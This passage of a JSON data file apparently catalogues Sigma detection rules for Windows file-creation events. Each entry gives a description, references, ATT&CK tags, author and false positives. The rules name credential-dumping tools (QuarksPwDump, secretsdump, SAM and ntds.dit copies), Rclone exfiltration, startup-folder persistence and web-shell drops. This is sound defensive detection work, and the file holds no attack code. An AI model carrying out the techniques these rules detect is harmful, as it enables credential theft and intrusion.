"https://github.com/redcanaryco/atomic-red-team/blob/36d49de4c8b00bf36054294b4a1fcbab3917d7c5/atomics/T1547.001/T1547.001.md#atomic-test-7---add-executable-shortcut-link-to-user-startup-folder", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_powershell_startup_shortcuts.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1547.001" - ], - "creation_date": "2021/10/24", - "filename": "file_event_win_powershell_startup_shortcuts.yml", - "author": "Christopher Peacock '@securepeacock', SCYTHE", - "level": "high", - "falsepositive": [ - "Unknown", - "Depending on your environment accepted applications may leverage this at times. It is recommended to search for anomalies inidicative of malware." - ], - "logsource.category": "file_event", - "logsource.product": "windows" - } - }, - { - "description": "Detects a dump file written by QuarksPwDump password dumper", - "uuid": "847def9e-924d-4e90-b7c4-5f581395a2b4", - "value": "QuarksPwDump Dump File", - "meta": { - "refs": [ - "https://jpcertcc.github.io/ToolAnalysisResultSheet/details/QuarksPWDump.htm", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_quarkspw_filedump.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1003.002" - ], - "creation_date": "2018/02/10", - "filename": "file_event_win_quarkspw_filedump.yml", - "author": "Florian Roth", - "level": "critical", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "file_event", - "logsource.product": "windows" - } - }, - { - "description": "Detects Rclone config file being created", - "uuid": "34986307-b7f4-49be-92f3-e7a4d01ac5db", - "value": "Rclone Config File Creation", - "meta": { - "refs": [ - "https://research.nccgroup.com/2021/05/27/detecting-rclone-an-effective-tool-for-exfiltration/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_rclone_exec_file.yml" - ], - "tags": [ - "attack.exfiltration", - "attack.t1567.002" - ], - "creation_date": "2021/05/26", - "filename": "file_event_win_rclone_exec_file.yml", - "author": "Aaron Greetham (@beardofbinary) - NCC Group", - "level": "high", - "falsepositive": [ - "Legitimate Rclone usage (rare)" - ], - "logsource.category": "file_event", - "logsource.product": "windows" - } - }, - { - "description": "Detects actions caused by the RedMimicry Winnti playbook", - "uuid": "130c9e58-28ac-4f83-8574-0a4cc913b97e", - "value": "RedMimicry Winnti Playbook Dropped File", - "meta": { - "refs": [ - "https://redmimicry.com", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_redmimicry_winnti_filedrop.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1027" - ], - "creation_date": "2020/06/24", - "filename": "file_event_win_redmimicry_winnti_filedrop.yml", - "author": "Alexander Rausch", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "file_event", - "logsource.product": "windows" - } - }, - { - "description": "Detects default filenames output from the execution of CrackMapExec and Impacket-secretsdump against an endpoint.", - "uuid": "6e2a900a-ced9-4e4a-a9c2-13e706f9518a", - "value": "Remote Credential Dump", - "meta": { - "refs": [ - "https://github.com/Porchetta-Industries/CrackMapExec", - "https://github.com/SecureAuthCorp/impacket/blob/master/examples/secretsdump.py", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_remote_cred_dump.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1003" - ], - "creation_date": "2022/11/16", - "filename": "file_event_win_remote_cred_dump.yml", - "author": "SecurityAura", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "file_event", - "logsource.product": "windows" - } - }, - { - "description": "Detects a phishing attack which expands a ZIP file containing a malicious shortcut. If the victim expands the ZIP file via the explorer process, then the explorer process expands the malicious ZIP file and drops a malicious shortcut redirected to a backdoor into the Startup folder. Additionally, the file name of the malicious shortcut in Startup folder contains {0AFACED1-E828-11D1-9187-B532F1E9575D} meaning the folder shortcut operation.", - "uuid": "a6976974-ea6f-4e97-818e-ea08625c52cb", - "value": "RipZip Attack on Startup Folder", - "meta": { - "refs": [ - "https://twitter.com/jonasLyk/status/1549338335243534336?t=CrmPocBGLbDyE4p6zTX1cg&s=19", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_ripzip_attack.yml" - ], - "tags": [ - "attack.t1547", - "attack.persistence" - ], - "creation_date": "2022/07/21", - "filename": "file_event_win_ripzip_attack.yml", - "author": "Greg (rule)", - "level": "high", - "falsepositive": "No established falsepositives", - "logsource.category": "file_event", - "logsource.product": "windows" - } - }, - { - "description": "Detects the creation of files that look like exports of the local SAM (Security Account Manager)", - "uuid": "4e87b8e2-2ee9-4b2a-a715-4727d297ece0", - "value": "SAM Dump File Creation", - "meta": { - "refs": [ - "https://github.com/search?q=CVE-2021-36934", - "https://github.com/cube0x0/CVE-2021-36934", - "https://www.google.com/search?q=%22reg.exe+save%22+sam", - "https://github.com/HuskyHacks/ShadowSteal", - "https://github.com/FireFart/hivenightmare", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_sam_dump.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1003.002" - ], - "creation_date": "2022/02/11", - "filename": "file_event_win_sam_dump.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Rare cases of administrative activity" - ], - "logsource.category": "file_event", - "logsource.product": "windows" - } - }, - { - "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)\n", - "uuid": "fec96f39-988b-4586-b746-b93d59fd1922", - "value": "ScreenConnect Temporary Installation Artefact", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-5---screenconnect-application-download-and-install-on-windows", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_screenconnect_artefact.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1219" - ], - "creation_date": "2022/02/13", - "filename": "file_event_win_screenconnect_artefact.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "Legitimate use" - ], - "logsource.category": "file_event", - "logsource.product": "windows" - } - }, - { - "description": "This rule will monitor executable and script file creation by office applications. Please add more file extensions or magic bytes to the logic of your choice.", - "uuid": "c7a74c80-ba5a-486e-9974-ab9e682bc5e4", - "value": "Created Files by Office Applications", - "meta": { - "refs": [ - "https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/", - "https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/02bcbfc2bfb8b4da601bb30de0344ae453aa1afe/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_script_creation_by_office_using_file_ext.yml" - ], - "tags": [ - "attack.t1204.002", - "attack.execution" - ], - "creation_date": "2021/08/23", - "filename": "file_event_win_script_creation_by_office_using_file_ext.yml", - "author": "Vadim Khrykov (ThreatIntel), Cyb3rEng (Rule)", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "file_event", - "logsource.product": "windows" - } - }, - { - "description": "Detects a Windows executable that writes files to suspicious folders", - "uuid": "1277f594-a7d1-4f28-a2d3-73af5cbeab43", - "value": "Windows Shell File Write to Suspicious Folder", - "meta": { - "refs": [ - "Internal Research", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_shell_write_susp_directory.yml" - ], - "tags": "No established tags", - "creation_date": "2021/11/20", - "filename": "file_event_win_shell_write_susp_directory.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "file_event", - "logsource.product": "windows" - } - }, - { - "description": "Detects windows executables that writes files with suspicious extensions", - "uuid": "b8fd0e93-ff58-4cbd-8f48-1c114e342e62", - "value": "Windows Binaries Write Suspicious Extensions", - "meta": { - "refs": [ - "Internal Research", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_shell_write_susp_files_extensions.yml" - ], - "tags": "No established tags", - "creation_date": "2022/08/12", - "filename": "file_event_win_shell_write_susp_files_extensions.yml", - "author": "Nasreddine Bencherchali", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "file_event", - "logsource.product": "windows" - } - }, - { - "description": "A General detection for files being created in the Windows startup directory. This could be an indicator of persistence.", - "uuid": "2aa0a6b4-a865-495b-ab51-c28249537b75", - "value": "Startup Folder File Write", - "meta": { - "refs": [ - "https://github.com/OTRF/detection-hackathon-apt29/issues/12", - "https://threathunterplaybook.com/evals/apt29/detections/5.B.1_611FCA99-97D0-4873-9E51-1C1BA2DBB40D.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_startup_folder_file_write.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1547.001" - ], - "creation_date": "2020/05/02", - "filename": "file_event_win_startup_folder_file_write.yml", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", - "level": "medium", - "falsepositive": [ - "An FP could be caused by legitimate application writing shortcuts for example. This folder should always be inspected to make sure that all the files in there are legitimate" - ], - "logsource.category": "file_event", - "logsource.product": "windows" - } - }, - { - "description": "Detects the usage of ADSI (LDAP) operations by tools. This may also detect tools like LDAPFragger.", - "uuid": "75bf09fa-1dd7-4d18-9af9-dd9e492562eb", - "value": "Suspicious ADSI-Cache Usage By Unknown Tool", - "meta": { - "refs": [ - "https://medium.com/@ivecodoe/detecting-ldapfragger-a-newly-released-cobalt-strike-beacon-using-ldap-for-c2-communication-c274a7f00961", - "https://blog.fox-it.com/2020/03/19/ldapfragger-command-and-control-over-ldap-attributes/", - "https://github.com/fox-it/LDAPFragger", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_adsi_cache_usage.yml" - ], - "tags": [ - "attack.t1001.003", - "attack.command_and_control" - ], - "creation_date": "2019/03/24", - "filename": "file_event_win_susp_adsi_cache_usage.yml", - "author": "xknow @xknow_infosec, Tim Shelton", - "level": "high", - "falsepositive": [ - "Other legimate tools, which do ADSI (LDAP) operations, e.g. any remoting activity by MMC, Powershell, Windows etc." - ], - "logsource.category": "file_event", - "logsource.product": "windows" - } - }, - { - "description": "Detects suspicious .NET assembly executions. Could detect using Cobalt Strike's command execute-assembly.", - "uuid": "e4b63079-6198-405c-abd7-3fe8b0ce3263", - "value": "Suspicious CLR Logs Creation", - "meta": { - "refs": [ - "https://blog.menasec.net/2019/07/interesting-difr-traces-of-net-clr.html", - "https://bohops.com/2021/03/16/investigating-net-clr-usage-log-tampering-techniques-for-edr-evasion/", - "https://github.com/olafhartong/sysmon-modular/blob/5e5f6d90819a7f35eec0aba08021d0d201bb9055/11_file_create/include_dotnet.xml", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_clr_logs.yml" - ], - "tags": [ - "attack.execution", - "attack.defense_evasion", - "attack.t1059.001", - "attack.t1218" - ], - "creation_date": "2020/10/12", - "filename": "file_event_win_susp_clr_logs.yml", - "author": "omkar72, oscd.community, Wojciech Lesicki", - "level": "high", - "falsepositive": [ - "Rundll32.exe with zzzzInvokeManagedCustomActionOutOfProc in command line and msiexec.exe as parent process - https://twitter.com/SBousseaden/status/1388064061087260675" - ], - "logsource.category": "file_event", - "logsource.product": "windows" - } - }, - { - "description": "Once executed, colorcpl.exe will copy the arbitrary file to c:\\windows\\system32\\spool\\drivers\\color\\", - "uuid": "e15b518d-b4ce-4410-a9cd-501f23ce4a18", - "value": "Suspicious Creation with Colorcpl", - "meta": { - "refs": [ - "https://twitter.com/eral4m/status/1480468728324231172?s=20", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_colorcpl.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1564" - ], - "creation_date": "2022/01/21", - "filename": "file_event_win_susp_colorcpl.yml", - "author": "frack113", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "file_event", - "logsource.product": "windows" - } - }, - { - "description": "This rule detects suspicious files created by Microsoft Sync Center (mobsync)", - "uuid": "409f8a98-4496-4aaa-818a-c931c0a8b832", - "value": "Created Files by Microsoft Sync Center", - "meta": { - "refs": [ - "https://redcanary.com/blog/intelligence-insights-november-2021/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_creation_by_mobsync.yml" - ], - "tags": [ - "attack.t1055", - "attack.t1218", - "attack.execution", - "attack.defense_evasion" - ], - "creation_date": "2022/04/28", - "filename": "file_event_win_susp_creation_by_mobsync.yml", - "author": "elhoim", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "file_event", - "logsource.product": "windows" - } - }, - { - "description": "Detects the creation of copy of suspicious files (EXE/DLL) to the default GPO storage folder", - "uuid": "5f87308a-0a5b-4623-ae15-d8fa1809bc60", - "value": "Suspicious Files in Default GPO Folder", - "meta": { - "refs": [ - "https://redcanary.com/blog/intelligence-insights-november-2021/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_default_gpo_dir_write.yml" - ], - "tags": [ - "attack.t1036.005", - "attack.defense_evasion" - ], - "creation_date": "2022/04/28", - "filename": "file_event_win_susp_default_gpo_dir_write.yml", - "author": "elhoim", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "file_event", - "logsource.product": "windows" - } - }, - { - "description": "Detects a suspicious Microsoft desktopimgdownldr file creation that stores a file to a suspicious location or contains a file with a suspicious extension", - "uuid": "fc4f4817-0c53-4683-a4ee-b17a64bc1039", - "value": "Suspicious Desktopimgdownldr Target File", - "meta": { - "refs": [ - "https://labs.sentinelone.com/living-off-windows-land-a-new-native-file-downldr/", - "https://twitter.com/SBousseaden/status/1278977301745741825", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_desktopimgdownldr_file.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1105" - ], - "creation_date": "2020/07/03", - "filename": "file_event_win_susp_desktopimgdownldr_file.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "False positives depend on scripts and administrative tools used in the monitored environment" - ], - "logsource.category": "file_event", - "logsource.product": "windows" - } - }, - { - "description": "Detects unusual processes accessing desktop.ini, which can be leveraged to alter how Explorer displays a folder's content (i.e. renaming files) without changing them on disk.", - "uuid": "81315b50-6b60-4d8f-9928-3466e1022515", - "value": "Suspicious desktop.ini Action", - "meta": { - "refs": [ - "https://isc.sans.edu/forums/diary/Desktopini+as+a+postexploitation+tool/25912/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_desktop_ini.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1547.009" - ], - "creation_date": "2020/03/19", - "filename": "file_event_win_susp_desktop_ini.yml", - "author": "Maxime Thiebaut (@0xThiebaut), Tim Shelton (HAWK.IO)", - "level": "medium", - "falsepositive": [ - "Operations performed through Windows SCCM or equivalent", - "Read only access list authority" - ], - "logsource.category": "file_event", - "logsource.product": "windows" - } - }, - { - "description": "Ransomware create txt file in the user Desktop", - "uuid": "caf02a0a-1e1c-4552-9b48-5e070bd88d11", - "value": "Suspicious Creation TXT File in User Desktop", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1486/T1486.md#atomic-test-5---purelocker-ransom-note", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_desktop_txt.yml" - ], - "tags": [ - "attack.impact", - "attack.t1486" - ], - "creation_date": "2021/12/26", - "filename": "file_event_win_susp_desktop_txt.yml", - "author": "frack113", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "file_event", - "logsource.product": "windows" - } - }, - { - "description": "Detects the creation of diagcab file, which could be caused by some legitimate installer or is a sign of exploitation (review the filename and its location)", - "uuid": "3d0ed417-3d94-4963-a562-4a92c940656a", - "value": "Creation of a Diagcab", - "meta": { - "refs": [ - "https://threadreaderapp.com/thread/1533879688141086720.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_diagcab.yml" - ], - "tags": [ - "attack.resource_development" - ], - "creation_date": "2022/06/08", - "filename": "file_event_win_susp_diagcab.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "Legitimate microsoft diagcab" - ], - "logsource.category": "file_event", - "logsource.product": "windows" - } - }, - { - "description": "Detects dropped files with double extensions, which is often used by malware as a method to abuse the fact that windows hide default extensions by default.", - "uuid": "b4926b47-a9d7-434c-b3a0-adc3fa0bd13e", - "value": "Suspicious Double Extension Files", - "meta": { - "refs": [ - "https://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-june-mustang-panda/", - "https://www.anomali.com/blog/china-based-apt-mustang-panda-targets-minority-groups-public-and-private-sector-organizations", - "https://www.cybereason.com/blog/research/a-bazar-of-tricks-following-team9s-development-cycles", - "https://twitter.com/malwrhunterteam/status/1235135745611960321", - "https://twitter.com/luc4m/status/1073181154126254080", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_double_extension.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1036.007" - ], - "creation_date": "2022/06/19", - "filename": "file_event_win_susp_double_extension.yml", - "author": "Nasreddine Bencherchali, frack113", - "level": "high", - "falsepositive": [ - "Unlikely" - ], - "logsource.category": "file_event", - "logsource.product": "windows" - } - }, - { - "description": "Detects the creation of an executable by another executable", - "uuid": "297afac9-5d02-4138-8c58-b977bac60556", - "value": "Creation of an Executable by an Executable", - "meta": { - "refs": [ - "Malware Sandbox", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_dropper.yml" - ], - "tags": [ - "attack.resource_development", - "attack.t1587.001" - ], - "creation_date": "2022/03/09", - "filename": "file_event_win_susp_dropper.yml", - "author": "frack113", - "level": "low", - "falsepositive": [ - "Software installers", - "Update utilities" - ], - "logsource.category": "file_event", - "logsource.product": "windows" - } - }, - { - "description": "Detects suspicious activity in which the MSExchangeMailboxReplication process writes .asp and .apsx files to disk, which could be a sign of ProxyShell exploitation", - "uuid": "7280c9f3-a5af-45d0-916a-bc01cb4151c9", - "value": "Suspicious MSExchangeMailboxReplication ASPX Write", - "meta": { - "refs": [ - "https://redcanary.com/blog/blackbyte-ransomware/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_exchange_aspx_write.yml" - ], - "tags": [ - "attack.initial_access", - "attack.t1190", - "attack.persistence", - "attack.t1505.003" - ], - "creation_date": "2022/02/25", - "filename": "file_event_win_susp_exchange_aspx_write.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "file_event", - "logsource.product": "windows" - } - }, - { - "description": "Detect creation of suspicious executable file name. Some strings look for suspicious file extensions, others look for filenames that exploit unquoted service paths.", - "uuid": "74babdd6-a758-4549-9632-26535279e654", - "value": "Suspicious Executable File Creation", - "meta": { - "refs": [ - "https://medium.com/@SumitVerma101/windows-privilege-escalation-part-1-unquoted-service-path-c7a011a8d8ae", - "https://app.any.run/tasks/76c69e2d-01e8-49d9-9aea-fb7cc0c4d3ad/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_executable_creation.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1564" - ], - "creation_date": "2022/09/05", - "filename": "file_event_win_susp_executable_creation.yml", - "author": "frack113", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "file_event", - "logsource.product": "windows" - } - }, - { - "description": "Get-Variable is a valid PowerShell cmdlet\nWindowsApps is by default in the path where PowerShell is executed.\nSo when the Get-Variable command is issued on PowerShell execution, the system first looks for the Get-Variable executable in the path and executes the malicious binary instead of looking for the PowerShell cmdlet.\n", - "uuid": "0c3fac91-5627-46e8-a6a8-a0d7b9b8ae1b", - "value": "Suspicious Get-Variable.exe Creation", - "meta": { - "refs": [ - "https://blog.malwarebytes.com/threat-intelligence/2022/04/colibri-loader-combines-task-scheduler-and-powershell-in-clever-persistence-technique/", - "https://www.joesandbox.com/analysis/465533/0/html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_get_variable.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1546", - "attack.defense_evasion", - "attack.t1027" - ], - "creation_date": "2022/04/23", - "filename": "file_event_win_susp_get_variable.yml", - "author": "frack113", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "file_event", - "logsource.product": "windows" - } - }, - { - "description": "Detects dropped files with LNK double extension, which is often used by malware as a method to abuse the fact that windows hide default extensions by default.", - "uuid": "3215aa19-f060-4332-86d5-5602511f3ca8", - "value": "Suspicious LNK Double Extension Files", - "meta": { - "refs": [ - "https://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-june-mustang-panda/", - "https://www.anomali.com/blog/china-based-apt-mustang-panda-targets-minority-groups-public-and-private-sector-organizations", - "https://www.cybereason.com/blog/research/a-bazar-of-tricks-following-team9s-development-cycles", - "https://twitter.com/malwrhunterteam/status/1235135745611960321", - "https://twitter.com/luc4m/status/1073181154126254080", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_lnk_double_extension.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1036.007" - ], - "creation_date": "2022/11/07", - "filename": "file_event_win_susp_lnk_double_extension.yml", - "author": "Nasreddine Bencherchali, frack113", - "level": "medium", - "falsepositive": [ - "Users creating a shortcut on e.g. desktop" - ], - "logsource.category": "file_event", - "logsource.product": "windows" - } - }, - { - "description": "Detects suspicious processes that write (copy) a Active Directory database (ntds.dit) file", - "uuid": "11b1ed55-154d-4e82-8ad7-83739298f720", - "value": "Suspicious Process Writes Ntds.dit", - "meta": { - "refs": [ - "https://stealthbits.com/blog/extracting-password-hashes-from-the-ntds-dit-file/", - "https://adsecurity.org/?p=2398", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_ntds_dit.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1003.002", - "attack.t1003.003" - ], - "creation_date": "2022/01/11", - "filename": "file_event_win_susp_ntds_dit.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "file_event", - "logsource.product": "windows" - } - }, - { - "description": "A general detection for processes creating PFX files. This could be an indicator of an adversary exporting a local certificate to a PFX file.", - "uuid": "dca1b3e8-e043-4ec8-85d7-867f334b5724", - "value": "Suspicious PFX File Creation", - "meta": { - "refs": [ - "https://github.com/OTRF/detection-hackathon-apt29/issues/14", - "https://threathunterplaybook.com/evals/apt29/detections/6.B.1_6392C9F1-D975-4F75-8A70-433DEDD7F622.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_pfx_file_creation.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1552.004" - ], - "creation_date": "2020/05/02", - "filename": "file_event_win_susp_pfx_file_creation.yml", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", - "level": "medium", - "falsepositive": [ - "System administrators managing certififcates." - ], - "logsource.category": "file_event", - "logsource.product": "windows" - } - }, - { - "description": "Detects the creation or modification of a powershell profile which could indicate suspicious activity as the profile can be used as a mean of persistence", - "uuid": "b5b78988-486d-4a80-b991-930eff3ff8bf", - "value": "PowerShell Profile Modification", - "meta": { - "refs": [ - "https://www.welivesecurity.com/2019/05/29/turla-powershell-usage/", - "https://persistence-info.github.io/Data/powershellprofile.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_powershell_profile.yml" - ], - "tags": [ - "attack.persistence", - "attack.privilege_escalation", - "attack.t1546.013" - ], - "creation_date": "2019/10/24", - "filename": "file_event_win_susp_powershell_profile.yml", - "author": "HieuTT35, Nasreddine Bencherchali", - "level": "high", - "falsepositive": [ - "System administrator create Powershell profile manually" - ], - "logsource.category": "file_event", - "logsource.product": "windows" - } - }, - { - "description": "Detects the creation of the PROCEXP152.sys file in the application-data local temporary folder.\nThis driver is used by Sysinternals Process Explorer but also by KDU (https://github.com/hfiref0x/KDU) or Ghost-In-The-Logs (https://github.com/bats3c/Ghost-In-The-Logs), which uses KDU.\n", - "uuid": "3da70954-0f2c-4103-adff-b7440368f50e", - "value": "Suspicious PROCEXP152.sys File Created In TMP", - "meta": { - "refs": [ - "https://blog.dylan.codes/evading-sysmon-and-windows-event-logging/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_procexplorer_driver_created_in_tmp_folder.yml" - ], - "tags": [ - "attack.t1562.001", - "attack.defense_evasion" - ], - "creation_date": "2019/04/08", - "filename": "file_event_win_susp_procexplorer_driver_created_in_tmp_folder.yml", - "author": "xknow (@xknow_infosec), xorxes (@xor_xes)", - "level": "medium", - "falsepositive": [ - "Other legimate tools using this driver and filename (like Sysinternals). Note - Clever attackers may easily bypass this detection by just renaming the driver filename. Therefore just Medium-level and don't rely on it." - ], - "logsource.category": "file_event", - "logsource.product": "windows" - } - }, - { - "description": "Detects the creation of suspcious binary files inside the \"\\windows\\system32\\spool\\drivers\\color\\\" as seen in the blog referenced below", - "uuid": "ce7066a6-508a-42d3-995b-2952c65dc2ce", - "value": "Drop Binaries Into Spool Drivers Color Folder", - "meta": { - "refs": [ - "https://www.microsoft.com/security/blog/2022/07/27/untangling-knotweed-european-private-sector-offensive-actor-using-0-day-exploits/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_spool_drivers_color_drop.yml" - ], - "tags": [ - "attack.defense_evasion" - ], - "creation_date": "2022/07/28", - "filename": "file_event_win_susp_spool_drivers_color_drop.yml", - "author": "Nasreddine Bencherchali", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "file_event", - "logsource.product": "windows" - } - }, - { - "description": "Detects when a file with a suspicious extension is created in the startup folder", - "uuid": "28208707-fe31-437f-9a7f-4b1108b94d2e", - "value": "Suspicious Startup Folder Persistence", - "meta": { - "refs": [ - "https://github.com/last-byte/PersistenceSniper", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_startup_folder_persistence.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1547.001" - ], - "creation_date": "2022/08/10", - "filename": "file_event_win_susp_startup_folder_persistence.yml", - "author": "Nasreddine Bencherchali", - "level": "high", - "falsepositive": [ - "Rare legitimate usage of some of the extensions mentioned in the rule" - ], - "logsource.category": "file_event", - "logsource.product": "windows" - } - }, - { - "description": "Detects the creation of files that indicator an interactive use of PowerShell in the SYSTEM user context", - "uuid": "5b40a734-99b6-4b98-a1d0-1cea51a08ab2", - "value": "Suspicious Interactive PowerShell as SYSTEM", - "meta": { - "refs": [ - "https://jpcertcc.github.io/ToolAnalysisResultSheet/details/PowerSploit_Invoke-Mimikatz.htm", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_system_interactive_powershell.yml" - ], - "tags": "No established tags", - "creation_date": "2021/12/07", - "filename": "file_event_win_susp_system_interactive_powershell.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Administrative activity", - "PowerShell scripts running as SYSTEM user" - ], - "logsource.category": "file_event", - "logsource.product": "windows" - } - }, - { - "description": "Detects the creation of tasks from processes executed from suspicious locations", - "uuid": "80e1f67a-4596-4351-98f5-a9c3efabac95", - "value": "Suspicious Scheduled Task Write to System32 Tasks", - "meta": { - "refs": [ - "Internal Research", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_task_write.yml" - ], - "tags": [ - "attack.persistence", - "attack.execution", - "attack.t1053" - ], - "creation_date": "2021/11/16", - "filename": "file_event_win_susp_task_write.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "file_event", - "logsource.product": "windows" - } - }, - { - "description": "Detects the creation of log files during a TeamViewer remote session", - "uuid": "162ab1e4-6874-4564-853c-53ec3ab8be01", - "value": "TeamViewer Remote Session", - "meta": { - "refs": [ - "https://www.teamviewer.com/en-us/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_teamviewer_remote_session.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1219" - ], - "creation_date": "2022/01/30", - "filename": "file_event_win_susp_teamviewer_remote_session.yml", - "author": "Florian Roth", - "level": "medium", - "falsepositive": [ - "Legitimate uses of TeamViewer in an organisation" - ], - "logsource.category": "file_event", - "logsource.product": "windows" - } - }, - { - "description": "Detects the creation or modification of a vscode related powershell profile which could indicate suspicious activity as the profile can be used as a mean of persistence", - "uuid": "3a9fa2ec-30bc-4ebd-b49e-7c9cff225502", - "value": "VsCode Powershell Profile Modification", - "meta": { - "refs": [ - "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_profiles?view=powershell-7.2", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_vscode_powershell_profile.yml" - ], - "tags": [ - "attack.persistence", - "attack.privilege_escalation", - "attack.t1546.013" - ], - "creation_date": "2022/08/24", - "filename": "file_event_win_susp_vscode_powershell_profile.yml", - "author": "Nasreddine Bencherchali", - "level": "high", - 